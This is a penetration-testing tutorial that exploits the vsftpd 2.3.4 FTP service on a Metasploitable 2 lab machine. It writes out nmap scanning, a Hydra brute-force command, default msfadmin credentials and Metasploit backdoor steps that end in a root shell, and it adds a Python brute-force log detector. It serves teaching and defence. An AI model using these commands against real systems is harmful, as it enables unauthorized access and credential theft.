Penetration Testing Series: Hacking Metasploitable 2 By Exploiting FTP Port 21

Introduction
In this article, we delve into the intriguing realm of penetration testing by exploring the process of exploiting FTP Port 21 on the renowned vulnerable virtual machine, Metasploitable 2.
Metasploitable 2 is intentionally designed to be susceptible to various attacks and is a resource for security professionals to enhance their offensive security skills. By targeting Metasploitable 2’s vulnerable FTP service, we aim to provide an in-depth understanding of the techniques employed by ethical hackers and penetration testers to exploit and gain unauthorized access to systems.
FTP (File Transfer Protocol) is a widely used network protocol that facilitates the transfer of files between a client and a server over a computer network. While it remains an essential tool for data exchange, it also presents a potential avenue for attackers to breach a system. In this article, we focus on exploiting FTP Port 21, the default port FTP servers use for control and command operations.
Throughout this exploration, we will utilize the Metasploit Framework to illustrate how to take advantage of the vulnerabilities in the FTP service on Metasploitable 2 by employing commonly available modules and payloads. With this approach, we can access the target system without authorization.
It is important to emphasize that this article’s intent is solely educational and aimed at empowering security professionals and enthusiasts with knowledge on how to identify and secure their systems against potential threats. Understanding the tactics used by malicious actors is critical in developing robust defense mechanisms and implementing effective security measures.
Disclaimer:
All information, techniques, and tools described in this write-up are for educational purposes only. Use anything in this write-up at your discretion; I cannot be held responsible for any damages caused to any systems or yourselves legally. Using all tools and techniques described in this write-up for attacking individuals or organizations without their prior consent is highly illegal. You must obey all applicable local, state, and federal laws. I assume and accept no liability and will not be responsible for any misuse or damage caused by using the information herein.
Lab Setup
- VirtualBox
- Kali Linux Virtual Machine (VM)
- Metasploitable 2 VM
Exploiting Metasploitable 2’s FTP Service: Gaining Unauthorized Access through Port 21
Part 1: Reconnaissance
To begin, we need to gather information about the target system. Follow these steps:
1. Use the ifconfig command to get the IP address of the Metasploitable 2 VM: 10.60.0.18.
ifconfig
2. In the Kali Linux VM, execute the “netdiscover” command to perform reconnaissance and find live hosts on the local network.
netdiscover -r 10.60.0.0/24
The netdiscover tool sends Address Resolution Protocol (ARP) requests to the network, allowing it to identify devices and their corresponding IP addresses. By listening to ARP replies, netdiscover can build a list of active hosts on the network and provide information such as IP addresses, MAC addresses, and device manufacturer details.
3. Note the IP address of the Metasploitable 2 VM (10.60.0.18) and its MAC address. Press “Ctrl + C” to exit netdiscover.


4. Use the “nmap” command to scan all TCP ports (-p-) with service version detection (-sV) and save the normal-format output to “META2.txt” (-oN).
nmap -p- -sV -oN META2.txt 10.60.0.18
The Nmap scan results show that FTP Port 21 is open on the target system.

Part 2: Create Username and Password List
In this section, we will create our own username and password list. Follow these steps:
1. Use the “nano” command to create a username file called “Users.txt.”
nano Users.txt

2. Input the desired usernames in the “Users.txt” file.

3. View the “Users.txt” file using the “cat” command.
cat Users.txt
4. Copy the usernames for later use.

5. Use the “nano” command to create a password file called “Passwords.txt.”
nano Passwords.txt
6. Paste all the usernames into the “Passwords.txt” file.

7. Use the “cat” command to view the passwords in the “Passwords.txt” file.
cat Passwords.txt

Part 3: Exploit Open FTP Port 21
Now that we have gathered the necessary information, we can exploit the FTP service on the target system. Follow these steps:

1. We already know from the Nmap scan that FTP Port 21 is open, and the version of the FTP server is “vsftpd 2.3.4,” an older version with known vulnerabilities.
2. Use the “hydra” command to execute the Hydra tool and perform a brute-force attack on the FTP service of the target system (IP address: 10.60.0.18) using the created username and password list.
hydra -L Users.txt -P Passwords.txt 10.60.0.18 ftp
Hydra will iterate through the wordlists and attempt to find valid credentials. If successful, we can use these credentials to gain FTP access to the server.

3. Type the following command to initiate an FTP client session and connect to the FTP server on the IP address 10.60.0.18.
ftp 10.60.0.18
You can use any valid username and password combination from the successful Hydra results. We used “msfadmin” as the username and password in this case.
4. Congratulations! You have successfully gained unauthorized access to the Metasploitable 2 machine via FTP Port 21.
Name: msfadmin
Password: msfadmin
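
From the defender's side, the Hydra run in this part leaves a recognisable trail in the FTP server's log. The following added example (not part of the original article) flags a burst of failed logins from one client and a successful login that follows it, assuming vsftpd's native log format; the client addresses, sample lines, threshold and window are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# vsftpd native log record: <time> [pid N] [user] OK|FAIL LOGIN: Client "ip"
LINE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Alert on >= threshold failed logins from one client inside window,
    and on a successful login while that burst is still inside the window."""
    fails = defaultdict(deque)   # ip -> timestamps of recent failures
    users = defaultdict(set)     # ip -> usernames that failed
    flagged, alerts = set(), []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue             # not a login record
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        ip, user = m["ip"], m["user"]
        q = fails[ip]
        while q and ts - q[0] > window:
            q.popleft()          # expire failures older than the window
        if m["result"] == "FAIL":
            q.append(ts)
            users[ip].add(user)
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("BRUTE_FORCE", ip, sorted(users[ip])))
        elif ip in flagged and q:
            alerts.append(("LOGIN_AFTER_BRUTE_FORCE", ip, [user]))
    return alerts

# Constructed sample log lines (not captured from a real server).
SAMPLE_LOG = """\
Mon Jul 10 12:00:01 2023 [pid 4101] [root] FAIL LOGIN: Client "10.60.0.5"
Mon Jul 10 12:00:02 2023 [pid 4103] [admin] FAIL LOGIN: Client "10.60.0.5"
Mon Jul 10 12:00:03 2023 [pid 4105] [user] FAIL LOGIN: Client "10.60.0.5"
Mon Jul 10 12:00:04 2023 [pid 4107] [service] FAIL LOGIN: Client "10.60.0.5"
Mon Jul 10 12:00:05 2023 [pid 4109] [postgres] FAIL LOGIN: Client "10.60.0.5"
Mon Jul 10 12:00:06 2023 [pid 4111] [msfadmin] OK LOGIN: Client "10.60.0.5"
Mon Jul 10 12:05:00 2023 [pid 4200] [backup] FAIL LOGIN: Client "10.60.0.9"
""".splitlines()

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

A LOGIN_AFTER_BRUTE_FORCE alert is the one to act on first, since it means a guessed credential worked and the account's password should be rotated.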

Part 4: Searchsploit
Another way to exploit FTP Port 21 is using a tool called “Searchsploit.” Follow these steps:
1. Type “bye” to exit the FTP session.

2. Copy the FTP version information, “vsftpd 2.3.4.”

3. Use the “searchsploit” command to search for known exploits related to the specific version of the vsftpd FTP server software (2.3.4) in the Exploit Database (EDB).
searchsploit vsftpd 2.3.4
The searchsploit tool will display any known vulnerabilities associated with this version of FTP, including exploits such as backdoor command execution and others compatible with Metasploit.

Part 5: Metasploit
Metasploit is a robust framework for penetration testing and exploitation. Follow these steps to utilize Metasploit to gain access to the target system:
1. Type “msfconsole” to launch the Metasploit Framework command-line interface.
msfconsole


2. Use the “search” command followed by the FTP version to search for information within the Metasploit Framework related to the vsftpd 2.3.4 FTP server version.
search vsftpd 2.3.4
We received back one exploit, which matches the backdoor exploit found with Searchsploit.

3. Type “use 0” to select and use the backdoor exploit.
use 0
4. Type “show options” to view the required parameters that need to be set for the exploit.
show options
5. Fill in the required parameters, such as setting the RHOSTS (Remote Hosts) to the IP address of the target system (10.60.0.18).
set RHOSTS 10.60.0.18
6. Type “show options” again to confirm that you have set RHOSTS correctly.
show options
7. Finally, type “exploit” to execute the exploitation and gain access to the Metasploitable 2 machine via FTP Port 21.
exploit

The exploit was successful, and we now have a shell on the target system and can perform various actions.
If we type “whoami,” the response will be “root.”
When the command “ifconfig” is entered, the resulting output will display the IP address of the Metasploitable 2 virtual machine, indicated as 10.60.0.18.

8. To exit Metasploit, type the following commands:
Ctrl C
y
exit
Conclusion
I appreciate you taking the time to read this article. Hopefully, the information presented has been helpful and valuable to you.
I aim to reach a wider audience and enlighten them about the potential risks of cyber-attacks, various types of penetration testing tools, and everything related to information technology.
If you would like to access more articles, please follow me.
Also, don’t hesitate to leave feedback or suggestions for future topics. Thanks again for your interest and support!